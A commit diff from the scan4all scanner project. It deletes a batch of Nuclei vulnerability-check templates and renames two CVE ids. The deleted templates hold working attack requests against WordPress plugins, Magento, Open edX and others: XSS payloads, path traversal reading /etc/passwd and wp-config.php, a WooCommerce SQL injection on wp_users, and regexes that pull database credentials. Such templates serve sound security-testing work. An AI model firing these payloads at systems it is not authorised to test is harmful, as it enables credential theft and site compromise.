Projects STRLCPY scan4all Commits a47b314c
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■
    1  -id: CVE-2022-1388
     1 +id: CVE-2022-1388_51pwn
    2 2   
    3 3  info:
    4 4   name: F5 BIG-IP iControl REST Auth Bypass RCE
    skipped 54 lines
  • ■ ■ ■ ■
    1  -id: CVE-2022-22954
     1 +id: CVE-2022-22954_51pwn
    2 2   
    3 3  info:
    4 4   name: VMware Workspace ONE Access - Server-Side Template Injection
    skipped 34 lines
  • ■ ■ ■ ■ ■ ■
    1  -id: rails6-xss
    2  -info:
    3  - name: Rails CRLF XSS (6.0.0 < rails <
    4  - author:
    5  - - l0ne1y
    6  -requests:
    7  -- matchers:
    8  - - type: word
    9  - part: body
    10  - words:
    11  - - javascript:alert(1)
    12  - - type: status
    13  - status:
    14  - - 302
    15  - - type: word
    16  - condition: and
    17  - part: header
    18  - words:
    19  - - 'Location: javascript:alert(22)'
    20  - - text/html
    21  - matchers-condition: and
    22  - redirects: false
    23  - path:
    24  - - '{{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0ajavascript:alert(22)'
    25  - method: POST
    26  - 
    27  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: CVE-2022-32159
    2  - 
    3  -info:
    4  - name: Open edX - Cross-site Scripting
    5  - author: arafatansari
    6  - severity: medium
    7  - description: |
    8  - Open edX platform before 2022-06-06 allows Reflected Cross-site Scripting via the "next" parameter in the logout URL.
    9  - reference:
    10  - -
    11  - -
    12  - -
    13  - -
    14  - classification:
    15  - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    16  - cvss-score: 5.4
    17  - cve-id: CVE-2022-32159
    18  - cwe-id: CWE-79
    19  - metadata:
    20  - comment: Hover the cursor on the redirect link
    21  - shodan-query: http.html:"Open edX"
    22  - verified: "true"
    23  - tags: cve,cve2022,openedx,xss
    24  - 
    25  -requests:
    26  - - method: GET
    27  - path:
    28  - - '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)'
    29  - 
    30  - matchers-condition: and
    31  - matchers:
    32  - - type: word
    33  - part: body
    34  - words:
    35  - - '<a href="+8"onmouseover="alert(document.domain)">click here to go to'
    36  - 
    37  - - type: word
    38  - part: header
    39  - words:
    40  - - text/html
    41  - 
    42  - - type: status
    43  - status:
    44  - - 200
    45  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: tomcat-manager-pathnormalization
    2  - 
    3  -info:
    4  - name: Tomcat Manager Path Normalization
    5  - author: organiccrap
    6  - severity: info
    7  - description: A Tomcat Manager login panel was discovered via path normalization. Normalizing a path involves modifying the string that identifies a path or file so that it conforms to a valid path on the target
    8  - operating system.
    9  - reference:
    10  - -
    11  - -
    12  - classification:
    13  - cwe-id: CWE-200
    14  - tags: panel,tomcat,apache
    15  - 
    16  -requests:
    17  - - method: GET
    18  - path:
    19  - - '{{BaseURL}}/..;/manager/html'
    20  - - '{{BaseURL}}/..;/host-manager/html'
    21  - 
    22  - matchers-condition: and
    23  - matchers:
    24  - - type: word
    25  - words:
    26  - - 'username="tomcat" password="s3cret"'
    27  - - 'manager-gui'
    28  - condition: and
    29  - 
    30  - - type: status
    31  - negative: true
    32  - status:
    33  - - 403
    34  - - 401
    35  - 
    36  -# Enhanced by mp on 2022/03/17
    37  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: magento-config
    2  - 
    3  -info:
    4  - name: Magento Config Disclosure
    5  - author: geeknik
    6  - severity: medium
    7  - metadata:
    8  - shodan-query: http.component:"Magento"
    9  - tags: config,exposure,magento
    10  - 
    11  -requests:
    12  - - method: GET
    13  - path:
    14  - - "{{BaseURL}}/app/etc/local.xml"
    15  - - "{{BaseURL}}/store/app/etc/local.xml"
    16  - 
    17  - matchers-condition: and
    18  - matchers:
    19  - - type: status
    20  - status:
    21  - - 200
    22  - 
    23  - - type: word
    24  - words:
    25  - - "text/xml"
    26  - part: header
    27  - 
    28  - - type: word
    29  - words:
    30  - - "Magento"
    31  - part: body
  • ■ ■ ■ ■ ■ ■
    1  -id: magento-information-disclosure
    2  - 
    3  -info:
    4  - name: Magento - Information Disclosure
    5  - author: ptonewreckin,danigoland
    6  - severity: high
    7  - description: |
    8  - Misconfigured instances of Magento may disclose usernames, passwords, and database configurations via /app/etc/local.xml
    9  - reference:
    10  - -
    11  - metadata:
    12  - verified: true
    13  - tags: magento,exposure,credential,config
    14  - 
    15  -requests:
    16  - - method: GET
    17  - path:
    18  - - "{{BaseURL}}/app/etc/local.xml"
    19  - - "{{BaseURL}}/app/etc/local.xml.additional"
    20  - - "{{BaseURL}}/store/app/etc/local.xml"
    21  - 
    22  - stop-at-first-match: true
    23  - matchers-condition: and
    24  - matchers:
    25  - - type: word
    26  - part: body
    27  - words:
    28  - - "* Magento"
    29  - - "<dbname>"
    30  - condition: and
    31  - 
    32  - - type: word
    33  - part: header
    34  - words:
    35  - - "application/xml"
    36  - 
    37  - - type: status
    38  - status:
    39  - - 200
    40  - 
    41  - extractors:
    42  - - type: regex
    43  - part: body
    44  - group: 1
    45  - regex:
    46  - - "<host><!\\[CDATA\\[(.+)\\]\\]><\\/host>"
    47  - - "<username><!\\[CDATA\\[(.+)\\]\\]><\\/username>"
    48  - - "<password><!\\[CDATA\\[(.+)\\]\\]><\\/password>"
    49  - - "<dbname><!\\[CDATA\\[(.+)\\]\\]><\\/dbname>"
    50  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: unauthenticated-influxdb
    2  - 
    3  -info:
    4  - name: Unauthentication InfluxDB Detection
    5  - author: pussycat0x
    6  - severity: high
    7  - metadata:
    8  - shodan-dork: InfluxDB
    9  - tags: unauth,db,influxdb,misconfig
    10  - 
    11  -requests:
    12  - - method: GET
    13  - path:
    14  - - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
    15  -
    16  - matchers-condition: and
    17  - matchers:
    18  - - type: word
    19  - part: body
    20  - words:
    21  - - '"results":'
    22  - - '"name":"databases"'
    23  - condition: and
    24  -
    25  - - type: status
    26  - status:
    27  - - 200
  • ■ ■ ■ ■ ■ ■
    1  -myrsync ./ $HOME/MyWork/scan4all/config/nuclei-templates
    2  - 
    3  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: concrete-xss
    2  - 
    3  -info:
    4  - name: Unauthenticated reflected XSS in preview_as_user function
    5  - author: shifacyclewla,hackergautam
    6  - severity: medium
    7  - description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter.
    8  - reference:
    9  - -
    10  - -
    11  - -
    12  - tags: concrete,xss,cms
    13  - 
    14  -requests:
    15  - - method: GET
    16  - path:
    17  - - '{{BaseURL}}/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("{{randstr}}")>'
    18  - 
    19  - matchers-condition: and
    20  - matchers:
    21  - - type: word
    22  - part: body
    23  - words:
    24  - - '</iframe><svg/onload=alert("{{randstr}}")>'
    25  - 
    26  - - type: word
    27  - part: header
    28  - words:
    29  - - "text/html"
    30  - - "CONCRETE5"
    31  - condition: and
    32  - 
    33  - - type: status
    34  - status:
    35  - - 200
  • ■ ■ ■ ■ ■ ■
    1  -id: gnuboard-sms-xss
    2  - 
    3  -info:
    4  - name: Gnuboard CMS - SMS Emoticon XSS
    5  - author: gy741
    6  - severity: medium
    7  - description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
    8  - reference:
    9  - -
    10  - -
    11  - metadata:
    12  - verified: true
    13  - shodan-query: http.html:"Gnuboard"
    14  - tags: xss,gnuboard
    15  - 
    16  -requests:
    17  - - method: GET
    18  - path:
    19  - - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"
    20  - 
    21  - matchers-condition: and
    22  - matchers:
    23  - - type: word
    24  - part: body
    25  - words:
    26  - - '"0nuboard<svg onload=alert(document.domain)>"'
    27  - 
    28  - - type: word
    29  - part: header
    30  - words:
    31  - - "text/html"
    32  - 
    33  - - type: status
    34  - status:
    35  - - 200
    36  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: accessibility-helper-xss
    2  - 
    3  -info:
    4  - name: WP Accessibility Helper (WAH) < - Reflected Cross-Site Scripting (XSS)
    5  - author: dhiyaneshDK
    6  - severity: medium
    7  - description: The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue.
    8  - reference:
    9  - -
    10  - tags: xss,wordpress,wp-plugin,wp
    11  - 
    12  -requests:
    13  - - method: GET
    14  - path:
    15  - - '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
    16  - 
    17  - matchers-condition: and
    18  - matchers:
    19  - - type: word
    20  - part: body
    21  - words:
    22  - - "var wah_target_src = '';alert(document.domain);//';"
    23  - 
    24  - - type: word
    25  - part: header
    26  - words:
    27  - - text/html
    28  - 
    29  - - type: status
    30  - status:
    31  - - 200
    32  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: admin-word-count-column-lfi
    2  - 
    3  -info:
    4  - name: WordPress Admin Word Count Column 2.2 - Local File Inclusion
    5  - author: daffainfo,Splint3r7
    6  - severity: high
    7  - description: WordPress Admin Word Count Column 2.2 is vulnerable to local file inclusion.
    8  - reference:
    9  - -
    10  - -
    11  - remediation: This plugin has been closed as of March 29, 2022 and is not available for download.
    12  - classification:
    13  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    14  - cvss-score: 7.5
    15  - cwe-id: CWE-22
    16  - tags: wordpress,wp-plugin,lfi,wp
    17  - 
    18  -requests:
    19  - - method: GET
    20  - path:
    21  - - '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
    22  - 
    23  - matchers-condition: and
    24  - matchers:
    25  - - type: regex
    26  - regex:
    27  - - "root:[x*]:0:0"
    28  - 
    29  - - type: status
    30  - status:
    31  - - 200
    32  - 
    33  -# Enhanced by mp on 2022/08/01
    34  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: cab-fare-calculator-lfi
    2  - 
    3  -info:
    4  - name: WordPress Cab fare calculator 1.0.3 - Local File Inclusion
    5  - author: Hassan Khan Yusufzai - Splint3r7
    6  - severity: high
    7  - description: WordPress Cab fare calculator 1.0.3 is vulnerable to local file inclusion.
    8  - reference:
    9  - -
    10  - -
    11  - classification:
    12  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    13  - cvss-score: 7.5
    14  - cwe-id: CWE-22
    15  - tags: wordpress,wp-plugin,lfi,wp
    16  - 
    17  -requests:
    18  - - method: GET
    19  - path:
    20  - - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1'
    21  - 
    22  - matchers-condition: and
    23  - matchers:
    24  - - type: regex
    25  - regex:
    26  - - "root:[x*]:0:0"
    27  - 
    28  - - type: status
    29  - status:
    30  - - 200
    31  - 
    32  -# Enhanced by mp on 2022/08/01
    33  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: candidate-application-lfi
    2  - 
    3  -info:
    4  - name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion
    5  - author: dhiyaneshDK
    6  - severity: high
    7  - description: WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
    8  - reference:
    9  - -
    10  - classification:
    11  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    12  - cvss-score: 8.6
    13  - cwe-id: CWE-22
    14  - tags: wordpress,wp-plugin,lfi,wp
    15  - 
    16  -requests:
    17  - - method: GET
    18  - path:
    19  - - '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'
    20  - 
    21  - matchers-condition: and
    22  - matchers:
    23  - - type: regex
    24  - regex:
    25  - - "root:[x*]:0:0"
    26  - 
    27  - - type: status
    28  - status:
    29  - - 200
    30  - 
    31  -# Enhanced by mp on 2022/04/21
    32  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: db-backup-lfi
    2  - 
    3  -info:
    4  - name: WordPress DB Backup <=4.5 - Local File Inclusion
    5  - author: dhiyaneshDK
    6  - severity: high
    7  - description: WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
    8  - reference:
    9  - -
    10  - -
    11  - classification:
    12  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    13  - cvss-score: 7.5
    14  - cwe-id: CWE-22
    15  - tags: wordpress,wp-plugin,lfi,wp
    16  - 
    17  -requests:
    18  - - method: GET
    19  - path:
    20  - - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
    21  - 
    22  - matchers-condition: and
    23  - matchers:
    24  - - type: word
    25  - part: body
    26  - words:
    27  - - "DB_NAME"
    28  - - "DB_PASSWORD"
    29  - condition: and
    30  - 
    31  - - type: status
    32  - status:
    33  - - 200
    34  - 
    35  -# Enhanced by mp on 2022/08/05
    36  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: feedwordpress-xss
    2  - 
    3  -info:
    4  - name: FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS)
    5  - author: dhiyaneshDk
    6  - severity: medium
    7  - description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
    8  - reference:
    9  - -
    10  - tags: wordpress,wp-plugin,xss,feedwordpress,authenticated
    11  - 
    12  -requests:
    13  - - raw:
    14  - - |
    15  - POST /wp-login.php HTTP/1.1
    16  - Host: {{Hostname}}
    17  - Origin: {{RootURL}}
    18  - Content-Type: application/x-www-form-urlencoded
    19  - Cookie: wordpress_test_cookie=WP%20Cookie%20check
    20  - 
    21  - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
    22  - - |
    23  - GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
    24  - Host: {{Hostname}}
    25  - 
    26  - cookie-reuse: true
    27  - matchers-condition: and
    28  - matchers:
    29  - - type: word
    30  - part: body
    31  - words:
    32  - - '"><img src=2 onerror=alert(document.domain)>" method="post">'
    33  - 
    34  - - type: word
    35  - part: header
    36  - words:
    37  - - text/html
    38  - 
    39  - - type: status
    40  - status:
    41  - - 200
    42  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: newsletter-manager-open-redirect
    2  - 
    3  -info:
    4  - name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect
    5  - author: akincibor
    6  - severity: low
    7  - description: |
    8  - The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.
    9  - reference:
    10  - -
    11  - metadata:
    12  - verified: true
    13  - tags: wp-plugin,redirect,wordpress,wp,unauth
    14  - 
    15  -requests:
    16  - - method: GET
    17  - path:
    18  - - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo"
    19  - 
    20  - matchers:
    21  - - type: regex
    22  - part: header
    23  - regex:
    24  - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' #
    25  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: ninjaform-open-redirect
    2  - 
    3  -info:
    4  - name: Ninja Forms < 3.4.34 - Administrator Open Redirect
    5  - author: dhiyaneshDk,daffainfo
    6  - severity: low
    7  - description: The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
    8  - reference:
    9  - -
    10  - tags: wordpress,redirect,wp-plugin,ninjaform,authenticated,wp
    11  - 
    12  -requests:
    13  - - raw:
    14  - - |
    15  - POST /wp-login.php HTTP/1.1
    16  - Host: {{Hostname}}
    17  - Origin: {{RootURL}}
    18  - Content-Type: application/x-www-form-urlencoded
    19  - Cookie: wordpress_test_cookie=WP%20Cookie%20check
    20  - 
    21  - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
    22  - 
    23  - - |
    24  - GET /wp-admin/admin-ajax.php?client_id=1&redirect= HTTP/1.1
    25  - Host: {{Hostname}}
    26  - 
    27  - req-condition: true
    28  - cookie-reuse: true
    29  - matchers:
    30  - - type: dsl
    31  - dsl:
    32  - - 'status_code_1 == 302'
    33  - - 'status_code_2 == 302'
    34  - - "contains(all_headers_2, 'Location:')"
    35  - condition: and
    36  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: simple-image-manipulator-lfi
    2  - 
    3  -info:
    4  - name: WordPress Simple Image Manipulator 1.0 - Local File Inclusion
    5  - author: dhiyaneshDK
    6  - severity: high
    7  - description: WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.
    8  - reference:
    9  - -
    10  - classification:
    11  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    12  - cvss-score: 7.5
    13  - cwe-id: CWE-22
    14  - tags: wordpress,wp-plugin,lfi,wp
    15  - 
    16  -requests:
    17  - - method: GET
    18  - path:
    19  - - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
    20  - 
    21  - matchers-condition: and
    22  - matchers:
    23  - - type: regex
    24  - regex:
    25  - - "root:[x*]:0:0"
    26  - 
    27  - - type: status
    28  - status:
    29  - - 200
    30  - 
    31  -# Enhanced by mp on 2022/07/29
    32  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: sniplets-lfi
    2  - 
    3  -info:
    4  - name: WordPress Sniplets 1.1.2 - Local File Inclusion
    5  - author: dhiyaneshDK
    6  - severity: high
    7  - description: WordPress Sniplets 1.1.2 is vulnerable to local file inclusion.
    8  - reference:
    9  - -
    10  - classification:
    11  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    12  - cvss-score: 7.5
    13  - cwe-id: CWE-22
    14  - tags: wordpress,wp-plugin,lfi,wp
    15  - 
    16  -requests:
    17  - - method: GET
    18  - path:
    19  - - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
    20  - 
    21  - matchers-condition: and
    22  - matchers:
    23  - - type: word
    24  - part: body
    25  - words:
    26  - - "DB_NAME"
    27  - - "DB_PASSWORD"
    28  - condition: and
    29  - 
    30  - - type: status
    31  - status:
    32  - - 200
    33  - 
    34  -# Enhanced by mp on 2022/07/29
    35  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: sniplets-xss
    2  - 
    3  -info:
    4  - name: Wordpress Plugin Sniplets - Cross-Site Scripting
    5  - author: dhiyaneshDK
    6  - severity: medium
    7  - description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets
    8  - reference:
    9  - -
    10  - tags: xss,wordpress,wp-plugin,wp
    11  - 
    12  -requests:
    13  - - method: GET
    14  - path:
    15  - - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
    16  - 
    17  - matchers-condition: and
    18  - matchers:
    19  - - type: word
    20  - part: body
    21  - words:
    22  - - "</script><script>alert(document.domain)</script>"
    23  - 
    24  - - type: word
    25  - part: header
    26  - words:
    27  - - text/html
    28  - 
    29  - - type: status
    30  - status:
    31  - - 200
    32  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: video-synchro-pdf-lfi
    2  - 
    3  -info:
    4  - name: WordPress Videos sync PDF 1.7.4 - Local File Inclusion
    5  - author: Hassan Khan Yusufzai - Splint3r7
    6  - severity: high
    7  - description: WordPress Videos sync PDF 1.7.4 is vulnerable to local file inclusion.
    8  - reference:
    9  - -
    10  - -
    11  - classification:
    12  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    13  - cvss-score: 7.5
    14  - cwe-id: CWE-22
    15  - tags: wordpress,wp-plugin,lfi,wp
    16  - 
    17  -requests:
    18  - - method: GET
    19  - path:
    20  - - '{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00'
    21  - 
    22  - matchers-condition: and
    23  - matchers:
    24  - - type: regex
    25  - regex:
    26  - - "root:[x*]:0:0"
    27  - 
    28  - - type: status
    29  - status:
    30  - - 200
    31  - 
    32  -# Enhanced by mp on 2022/07/29
    33  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: wordpress-woocommerce-sqli
    2  - 
    3  -info:
    4  - name: Woocommerce Unauthenticated SQL Injection
    5  - author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot
    6  - severity: critical
    7  - description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability.
    8  - reference:
    9  - -
    10  - -
    11  - -
    12  - classification:
    13  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    14  - cvss-score: 10.0
    15  - cwe-id: CWE-89
    16  - tags: wordpress,woocommerce,sqli,wp-plugin,injection
    17  - 
    18  -requests:
    19  - - method: GET
    20  - path:
    21  - - '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
    22  - - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
    23  - 
    24  - matchers-condition: and
    25  - matchers:
    26  - - type: word
    27  - words:
    28  - - 'sqli-test'
    29  - - 'attribute_counts'
    30  - - 'price_range'
    31  - - 'term'
    32  - condition: and
    33  - 
    34  - - type: word
    35  - words:
    36  - - 'application/json'
    37  - part: header
    38  - 
    39  - - type: status
    40  - status:
    41  - - 200
    42  - 
    43  -# Enhanced by mp on 2022/03/21
    44  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: wp-church-admin-xss
    2  - 
    3  -info:
    4  - name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS)
    5  - author: daffainfo
    6  - severity: medium
    7  - reference:
    8  - -
    9  - tags: wordpress,xss,wp-plugin
    10  - 
    11  -requests:
    12  - - method: GET
    13  - path:
    14  - - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
    15  - 
    16  - matchers-condition: and
    17  - matchers:
    18  - - type: word
    19  - words:
    20  - - "</script><script>alert(document.domain)</script>"
    21  - part: body
    22  - 
    23  - - type: word
    24  - part: header
    25  - words:
    26  - - text/html
    27  - 
    28  - - type: status
    29  - status:
    30  - - 200
    31  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: wp-revslider-file-download
    2  - 
    3  -info:
    4  - name: Wordpress Revslider - Local File Inclusion
    5  - author: pussycat0x
    6  - severity: high
    7  - description: WordPress Revslider is affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file.
    8  - reference:
    9  - -
    10  - -
    11  - classification:
    12  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    13  - cvss-score: 7.5
    14  - cwe-id: CWE-22
    15  - metadata:
    16  - google-dork: inurl:/wp-content/plugins/revslider
    17  - tags: wordpress,wp-plugin,lfi,revslider
    18  - 
    19  -requests:
    20  - - method: GET
    21  - path:
    22  - - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
    23  - - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
    24  - 
    25  - matchers-condition: and
    26  - matchers:
    27  - - type: word
    28  - part: body
    29  - words:
    30  - - "'DB_NAME'"
    31  - - "'DB_PASSWORD'"
    32  - - "'DB_USER'"
    33  - condition: and
    34  - 
    35  - - type: status
    36  - status:
    37  - - 200
    38  - 
    39  -# Enhanced by mp on 2022/07/29
    40  - 
  • ■ ■ ■ ■ ■ ■
    1  -id: wp-whmcs-xss
    2  - 
    3  -info:
    4  - name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS)
    5  - author: dhiyaneshDk
    6  - severity: medium
    7  - description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
    8  - reference:
    9  - -
    10  - tags: wordpress,wp-plugin,authenticated,whmcs,xss
    11  - 
    12  -requests:
    13  - - raw:
    14  - - |
    15  - POST /wp-login.php HTTP/1.1
    16  - Host: {{Hostname}}
    17  - Origin: {{RootURL}}
    18  - Content-Type: application/x-www-form-urlencoded
    19  - Cookie: wordpress_test_cookie=WP%20Cookie%20check
    20  - 
    21  - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
    22  - - |
    23  - GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
    24  - Host: {{Hostname}}
    25  - 
    26  - cookie-reuse: true
    27  - matchers-condition: and
    28  - matchers:
    29  - - type: word
    30  - part: body
    31  - words:
    32  - - "<strong><img src onerror=alert(document.domain)></strong>"
    33  - condition: and
    34  - 
    35  - - type: word
    36  - part: header
    37  - words:
    38  - - text/html
    39  - 
    40  - - type: status
    41  - status:
    42  - - 200
    43  - 
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